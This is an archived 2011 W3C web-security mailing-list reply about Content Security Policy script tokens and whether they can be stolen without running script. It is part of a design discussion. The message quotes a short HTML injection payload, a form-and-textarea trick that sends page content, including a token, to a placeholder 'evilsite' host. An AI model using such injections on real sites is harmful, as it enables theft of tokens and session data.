- From: gaz Heyes <gazheyes@gmail.com>
- Date: Fri, 28 Jan 2011 10:41:07 +0000
- To: Gervase Markham <gerv@mozilla.org>
- Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org
- Message-ID: <AANLkTinPwm8J5A5zJaSE=c+5Lcz180fHG2KNEjtujJBE@mail.gmail.com>
On 28 January 2011 10:33, Gervase Markham <gerv@mozilla.org> wrote: > How would you steal all tokens if you couldn't run any script because you > didn't have the token? > HTML5 makes that nice and easy for us, form-action, form-target, <textarea>, css styles width:100%;height:100%; there a lots of ways and HTML5 increases them. > If the token is equivalent to the user's session ID, then running some > malicious script becomes an equivalent problem to stealing their session ID > without script. That doesn't sound trivial to me. > > Or have I missed something? > > and then inject >> >> If for some crazy reason you decide to >> use session based tokens then you would have to validate all HTML >> injections >> > > I'm not sure what you mean by "validate all HTML injections", but I don't > think anyone is suggesting that using CSP means that you can just safely > print arbitrary user-supplied content as HTML. > Ok if we don't have a start and end marker and just one script key, any injections before the script key can steal it. <form action=//evilsite><textarea name=Can_I_have_a_key_please_bob>. If the key is session based that means we can reuse it and that means that our second request injects some javascript with a valid key. Now if we have a start and end marker we can parse the content inside and determine the restrictions e.g. this content shouldn't be posted externally, then after parsing the HTML you can then work out if the form should work or
Received on Friday, 28 January 2011 10:41:39 UTC